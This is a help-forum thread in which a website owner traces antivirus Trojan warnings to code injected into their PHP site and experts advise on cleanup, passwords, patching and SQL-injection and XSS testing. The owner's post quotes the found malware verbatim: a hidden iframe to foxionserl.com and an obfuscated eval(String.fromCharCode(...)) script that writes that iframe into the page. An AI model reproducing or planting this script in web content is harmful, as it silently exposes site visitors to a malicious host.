Help! My website is causing browsers to get HTML:IFrame-EE Trojan! and Mal/EncPk-F & Mal/HckPk-A also

I have a web site (I will give you the URL if someone says it is OK) in which I've had a couple browsers get this message from AVAST:
HTML:IFrame-EJ [trj]
Type: Trojan Horse

I also have once gotten the malware Mal/EncPk-F and Mal/HckPk-A (Sophos Anti-Virus) when visiting the site.

My hosting is through Go Daddy, and they insist there is no virus or trojan on their end.

Don't get me wrong - the website usually works without a problem; but we are getting ready to promote the website & I don't want any hint of malware coming to my site.

My site is on a UNIX server and I am using PHP & MySQL. I am using sessions on every page.
oh_maestroAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

Rich RumbleSecurity SamuraiCommented:
Look for code that is not your own, open your page, view source, use FireFox with the FireBug extension if you need help viewing any javascript. Do this from a Unix machine if possible. If you find code that is not your own, remove it. Look through logs if you can to find out how it got there. What does the site use, PHPbb code? WikiMedia code?
We can look at the url (please break it, hxxp://example.com) but really you need to find the injected files and see if go-daddy can help determine how they got there.
-rich
0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
warturtleCommented:
Yes, search for 'iframe' within your code and see if the attribute of the iframe is set to be invisible, that might trigger the antiviruses. See if its your own code or if GoDaddy has put in an iframe there for advertising purposes.
0
oh_maestroAuthor Commented:
hxxp://www.openhousesohio.com

Using Firebug, I found this:
<iframe height="3" width="1" src="http://foxionserl.com/">
 and this
<script type="text/javascript">
eval(String.fromCharCode(118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,114,32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50))

I did not type any of this code.

I do not see this code when I go to View+Source in IE. I also do not see anything like this on my code.
My main editor is Macromedia Dreamweaver MX 2004, and I have to FTP files to my GoDaddy account. I am using PHP 4.

Has my site been hacked?
0
KuppingerCole Reviews AlgoSec in Executive Report

Leading analyst firm, KuppingerCole reviews AlgoSec's Security Policy Management Solution, and the security challenges faced by companies today in their Executive View report.

oh_maestroAuthor Commented:
Increasing Pts!
0
warturtleCommented:
Hello,

Thanks for sending us more information. Have a look at this link:

http://www.directadmin.com/forum/showthread.php?p=157818

It might be worth finding out if someone else had access to your account, try changing password as a first thing and make it very difficult to guess with capital letters, small letters, numbers and 8 digits or over in length as well.

I've just been to the website as well and didn't see any iframe in the source code (but did see the long javascript code with lots of number and strangely enough it was appearing after the </html> tag which marks the end of the webpage). I think contacing GoDaddy would be a good idea to have them look at your setup.

Hope it helps.
0
Rich RumbleSecurity SamuraiCommented:
PHP4 is pretty old, you should upgrade if possible. There were several SQL injection attacks against that version of DW, make sure it's patched and updated: http://secunia.com/advisories/product/3194/?task=advisories
Find anything that is not yours on your server, and clean it out. Then chmod 644 every directory that does not need write access. Is this a godaddy server? they should provide more up to date instances of PHP.

http://www.UnmaskParasites.com/security-report/?page=openhousesohio.com
http://www.google.com/safebrowsing/diagnostic?site=openhousesohio.com
https://www.google.com/accounts/ServiceLoginAuth?service=sitemaps
http://www.directadmin.com/forum/showthread.php?p=157818
-rich
0
Rich RumbleSecurity SamuraiCommented:
I think your login form needs sanitization, download xss-me and sql-inject-me firefox extentions. Go to your login page, right click and select "open xss me sidebar" or the sql-inject me side bar, run all tests.
Read up on input validation/sanitization, xss and sql injection: http://shiflett.org/articles
I think he wrote and developed mysql_real_escape_string for php: http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
http://code.google.com/p/inspekt/
-rich
0
oh_maestroAuthor Commented:
The long Javascript code at the end was the culprit. Someone had hacked into my website and put that at the bottom of the page. I was able to get it removed from my site, and I have a whole new list of tougher passwords.
Thanks!
0
Rich RumbleSecurity SamuraiCommented:
Glad to help, and beyond password choices input validation is a must to avoid sql injection. The site looks solid from a xss point of view, but sql injection on your login form could be worse.
Good luck!
-rich
0
warturtleCommented:
Thats good stuff! Thanks for the feedback :)
0
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
Networking

From novice to tech pro — start learning today.

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.